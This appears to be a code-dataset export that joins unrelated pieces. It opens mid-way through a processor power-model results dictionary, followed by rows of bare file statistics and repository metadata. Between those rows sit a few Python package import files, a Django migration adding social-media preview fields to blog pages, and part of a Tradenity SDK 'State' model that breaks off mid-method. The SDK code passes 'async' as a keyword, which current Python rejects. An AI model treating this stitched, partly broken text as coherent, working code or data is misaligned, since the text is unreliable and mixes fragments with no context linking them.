'Execution Unit/Register Files/Peak Dynamic': 0.0981469,
'Execution Unit/Register Files/Runtime Dynamic': 0.0309436,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.112436,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.232057,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.21377,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000249816,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000249816,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000226678,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 9.27219e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000391563,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00111787,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00207049,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0262038,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.66679,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0613393,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0889998,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.96619,
'Instruction Fetch Unit/Runtime Dynamic': 0.179731,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0285357,
'L2/Runtime Dynamic': 0.00792079,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.99531,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.376367,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0245292,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0245291,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.11114,
'Load Store Unit/Runtime Dynamic': 0.521865,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0604848,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.120969,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0214663,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0218912,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.103635,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0100662,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.296619,
'Memory Management Unit/Runtime Dynamic': 0.0319575,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.4153,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.134308,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00559899,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0419014,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.181809,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.13705,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.992947460345098,
'Runtime Dynamic': 5.992947460345098,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.282264,
'Runtime Dynamic': 0.0831713,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.8327,
'Peak Power': 106.945,
'Runtime Dynamic': 15.6615,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.5505,
'Total Cores/Runtime Dynamic': 15.5783,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.282264,
'Total L3s/Runtime Dynamic': 0.0831713,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.084245
| 124
| 0.682151
| 8,083
| 68,627
| 5.785723
| 0.068168
| 0.123509
| 0.112903
| 0.093401
| 0.938289
| 0.929842
| 0.917055
| 0.886841
| 0.862614
| 0.841894
| 0
| 0.132204
| 0.22427
| 68,627
| 914
| 125
| 75.084245
| 0.746262
| 0
| 0
| 0.642232
| 0
| 0
| 0.657239
| 0.048085
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7f5743783e0f0f03cd0f84a64c0c56f1d88d695
| 110
|
py
|
Python
|
fintulib/__init__.py
|
TheDr1ver/fintulib
|
8ed45562d1b5452696288d22363691fbe085afd5
|
[
"MIT"
] | null | null | null |
fintulib/__init__.py
|
TheDr1ver/fintulib
|
8ed45562d1b5452696288d22363691fbe085afd5
|
[
"MIT"
] | null | null | null |
fintulib/__init__.py
|
TheDr1ver/fintulib
|
8ed45562d1b5452696288d22363691fbe085afd5
|
[
"MIT"
] | 1
|
2022-01-27T15:41:14.000Z
|
2022-01-27T15:41:14.000Z
|
from fintulib import common
from fintulib import model
from fintulib import wrangle
from fintulib import cloud
| 27.5
| 28
| 0.863636
| 16
| 110
| 5.9375
| 0.4375
| 0.505263
| 0.757895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 110
| 4
| 29
| 27.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1bf9a6fd61a0ee11d2c08aeaea337dbc6f3dd2c1
| 5,160
|
py
|
Python
|
app/modules/blog_posts/migrations/0004_auto_20200402_1442.py
|
nickmoreton/nhsx-website
|
2397d1308376c02b75323d30e6bc916af0daac9d
|
[
"MIT"
] | 50
|
2019-04-04T17:50:00.000Z
|
2021-08-05T15:08:37.000Z
|
app/modules/blog_posts/migrations/0004_auto_20200402_1442.py
|
nickmoreton/nhsx-website
|
2397d1308376c02b75323d30e6bc916af0daac9d
|
[
"MIT"
] | 434
|
2019-04-04T18:25:32.000Z
|
2022-03-31T18:23:37.000Z
|
app/modules/blog_posts/migrations/0004_auto_20200402_1442.py
|
nhsx-mirror/nhsx-website
|
2133b4e275ca35ff77f7d6874e809f139ec4bf86
|
[
"MIT"
] | 23
|
2019-04-04T09:52:07.000Z
|
2021-04-11T07:41:47.000Z
|
# Generated by Django 3.0.4 on 2020-04-02 14:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("images", "0001_initial"),
("blog_posts", "0003_auto_20200402_0748"),
]
operations = [
migrations.AddField(
model_name="blogpost",
name="fb_og_description",
field=models.CharField(
blank=True,
help_text="Facebook OG description - max 300 chars",
max_length=300,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="fb_og_image",
field=models.ForeignKey(
blank=True,
help_text="Facebook OG image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpost",
name="fb_og_title",
field=models.CharField(
blank=True,
help_text="Facebook OG title - max 40 chars",
max_length=40,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_alt_text",
field=models.CharField(
blank=True,
help_text="Twitter card image alt text - max 100 chars",
max_length=100,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_description",
field=models.CharField(
blank=True,
help_text="Twitter card description - max 200 chars",
max_length=200,
null=True,
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_image",
field=models.ForeignKey(
blank=True,
help_text="Twitter card image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpost",
name="twitter_card_title",
field=models.CharField(
blank=True,
help_text="Twitter card title - max 40 chars",
max_length=40,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="fb_og_description",
field=models.CharField(
blank=True,
help_text="Facebook OG description - max 300 chars",
max_length=300,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="fb_og_image",
field=models.ForeignKey(
blank=True,
help_text="Facebook OG image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="fb_og_title",
field=models.CharField(
blank=True,
help_text="Facebook OG title - max 40 chars",
max_length=40,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_alt_text",
field=models.CharField(
blank=True,
help_text="Twitter card image alt text - max 100 chars",
max_length=100,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_description",
field=models.CharField(
blank=True,
help_text="Twitter card description - max 200 chars",
max_length=200,
null=True,
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_image",
field=models.ForeignKey(
blank=True,
help_text="Twitter card image",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="images.NHSXImage",
),
),
migrations.AddField(
model_name="blogpostindexpage",
name="twitter_card_title",
field=models.CharField(
blank=True,
help_text="Twitter card title - max 40 chars",
max_length=40,
null=True,
),
),
]
| 31.463415
| 72
| 0.479264
| 450
| 5,160
| 5.306667
| 0.144444
| 0.073702
| 0.134841
| 0.158291
| 0.917504
| 0.917504
| 0.917504
| 0.917504
| 0.899497
| 0.899497
| 0
| 0.029452
| 0.427519
| 5,160
| 163
| 73
| 31.656442
| 0.778944
| 0.008721
| 0
| 0.942675
| 1
| 0
| 0.191277
| 0.022101
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012739
| 0
| 0.031847
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4019c3402eb782167193c6b0195f2d55db43ef50
| 71
|
py
|
Python
|
python/eda/eda/components/__init__.py
|
32bitmicro/EDA
|
476a7f6dda23a494788bfdfaa27dff7082a80d6d
|
[
"BSD-3-Clause"
] | 1
|
2019-06-05T20:01:19.000Z
|
2019-06-05T20:01:19.000Z
|
python/eda/eda/components/__init__.py
|
32bitmicro/EDA
|
476a7f6dda23a494788bfdfaa27dff7082a80d6d
|
[
"BSD-3-Clause"
] | null | null | null |
python/eda/eda/components/__init__.py
|
32bitmicro/EDA
|
476a7f6dda23a494788bfdfaa27dff7082a80d6d
|
[
"BSD-3-Clause"
] | null | null | null |
from eda.components.component import *
from eda.components.ST import *
| 23.666667
| 38
| 0.802817
| 10
| 71
| 5.7
| 0.6
| 0.245614
| 0.596491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 39
| 35.5
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
40e0664af37796187c6580eb9fe43aca8083e573
| 253
|
py
|
Python
|
pyVenv/src/InventoryManagement/InvManage/views/__init__.py
|
thephilosophicaljijutsumaster/InventoryManagement
|
7c57fcc435976c39b249106642ee848da2eea201
|
[
"MIT"
] | null | null | null |
pyVenv/src/InventoryManagement/InvManage/views/__init__.py
|
thephilosophicaljijutsumaster/InventoryManagement
|
7c57fcc435976c39b249106642ee848da2eea201
|
[
"MIT"
] | 12
|
2020-07-05T14:30:46.000Z
|
2020-08-06T21:06:00.000Z
|
pyVenv/src/InventoryManagement/InvManage/views/__init__.py
|
thephilosophicaljijutsumaster/InventoryManagement
|
7c57fcc435976c39b249106642ee848da2eea201
|
[
"MIT"
] | null | null | null |
from .product_views import *
from .goods_receipt_note_views import *
from .purchase_order_views import *
from .company_views import *
from .vendor_views import *
from .consumer_views import *
from .sales_order_views import *
from .history_views import *
| 31.625
| 39
| 0.814229
| 36
| 253
| 5.388889
| 0.388889
| 0.453608
| 0.541237
| 0.206186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12253
| 253
| 8
| 40
| 31.625
| 0.873874
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
40f89acae399f79fe09a8934146f64e3372a93a8
| 180
|
py
|
Python
|
src/ehrlich_aberth_jax/__init__.py
|
fbartolic/extending-jax
|
d15fcbca5b8facc074c4ee4fa789351ffca2fac2
|
[
"MIT"
] | null | null | null |
src/ehrlich_aberth_jax/__init__.py
|
fbartolic/extending-jax
|
d15fcbca5b8facc074c4ee4fa789351ffca2fac2
|
[
"MIT"
] | null | null | null |
src/ehrlich_aberth_jax/__init__.py
|
fbartolic/extending-jax
|
d15fcbca5b8facc074c4ee4fa789351ffca2fac2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__all__ = ["__version__", "ehrlich_aberth"]
from .ehrlich_aberth_jax import ehrlich_aberth
from .ehrlich_aberth_jax_version import version as __version__
| 25.714286
| 62
| 0.777778
| 23
| 180
| 5.26087
| 0.478261
| 0.429752
| 0.280992
| 0.396694
| 0.545455
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0.006289
| 0.116667
| 180
| 6
| 63
| 30
| 0.754717
| 0.116667
| 0
| 0
| 0
| 0
| 0.159236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9056c6f1ee0e05497d0ffb4a0fa76c4c363725f8
| 27,008
|
py
|
Python
|
tradenity/resources/state.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | 1
|
2020-03-19T04:09:17.000Z
|
2020-03-19T04:09:17.000Z
|
tradenity/resources/state.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | null | null | null |
tradenity/resources/state.py
|
tradenity/python-sdk
|
d13fbe23f4d6ff22554c6d8d2deaf209371adaf1
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Tradenity API
Tradenity eCommerce Rest API
Contact: support@tradenity.com
"""
from __future__ import absolute_import
import re
import pprint
# python 2 and python 3 compatibility library
import six
from tradenity.api_client import ApiClient
class State(object):
swagger_types = {
'id': 'str',
'meta': 'InstanceMeta',
'name': 'str',
'code': 'str',
'country': 'Country'
}
attribute_map = {
'id': 'id',
'meta': '__meta',
'name': 'name',
'code': 'code',
'country': 'country'
}
api_client = None
def __init__(self, id=None, meta=None, name=None, code=None, country=None):
"""State - a model defined in Swagger"""
self._id = id
self._meta = None
self._name = None
self._code = None
self._country = None
self.discriminator = None
if meta is not None:
self.meta = meta
self.name = name
if code is not None:
self.code = code
self.country = country
@property
def id(self):
if self._id:
return self._id
elif self.meta is None:
return None
else:
self._id = self.meta.href.split("/")[-1]
return self._id
@id.setter
def id(self, new_id):
self._id = new_id
@property
def meta(self):
"""Gets the meta of this State.
:return: The meta of this State.
:rtype: InstanceMeta
"""
return self._meta
@meta.setter
def meta(self, meta):
"""Sets the meta of this State.
:param meta: The meta of this State.
:type: InstanceMeta
"""
self._meta = meta
@property
def name(self):
"""Gets the name of this State.
:return: The name of this State.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this State.
:param name: The name of this State.
:type: str
"""
self._name = name
@property
def code(self):
"""Gets the code of this State.
:return: The code of this State.
:rtype: str
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this State.
:param code: The code of this State.
:type: str
"""
self._code = code
@property
def country(self):
"""Gets the country of this State.
:return: The country of this State.
:rtype: Country
"""
return self._country
@country.setter
def country(self, country):
"""Sets the country of this State.
:param country: The country of this State.
:type: Country
"""
self._country = country
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(State, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, State):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
@classmethod
def get_api_client(cls):
if cls.api_client is None:
cls.api_client = ApiClient.instance()
return cls.api_client
@classmethod
def find_all(cls, **kwargs):
return cls.list_all_states(**kwargs)
@classmethod
def find_all_by(cls, **kwargs):
return cls.list_all_states(**kwargs)
@classmethod
def find_one_by(cls, **kwargs):
results = cls.list_all_states(**kwargs)
if len(results) > 0:
return results[0]
@classmethod
def find_by_id(cls, id):
return cls.get_state_by_id(id)
def create(self):
new_instance = self.create_state(self)
self.id = new_instance.id
return self
def update(self):
return self.update_state_by_id(self.id, self)
def delete(self):
return self.delete_state_by_id(self.id)
@classmethod
def create_state(cls, state, **kwargs):
"""Create State
Create a new State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_state(state, async=True)
>>> result = thread.get()
:param async bool
:param State state: Attributes of state to create (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._create_state_with_http_info(state, **kwargs)
else:
(data) = cls._create_state_with_http_info(state, **kwargs)
return data
@classmethod
def _create_state_with_http_info(cls, state, **kwargs):
"""Create State
Create a new State
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_state_with_http_info(state, async=True)
>>> result = thread.get()
:param async bool
:param State state: Attributes of state to create (required)
:return: State
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'state' is set
if ('state' not in params or
params['state'] is None):
raise ValueError("Missing the required parameter `state` when calling `create_state`")
collection_formats = {}
path_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'state' in params:
body_params = params['state']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/states', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='State',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
@classmethod
def delete_state_by_id(cls, state_id, **kwargs):
"""Delete State
Delete an instance of State by its ID.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_state_by_id(state_id, async=True)
>>> result = thread.get()
:param async bool
:param str state_id: ID of state to delete. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._delete_state_by_id_with_http_info(state_id, **kwargs)
else:
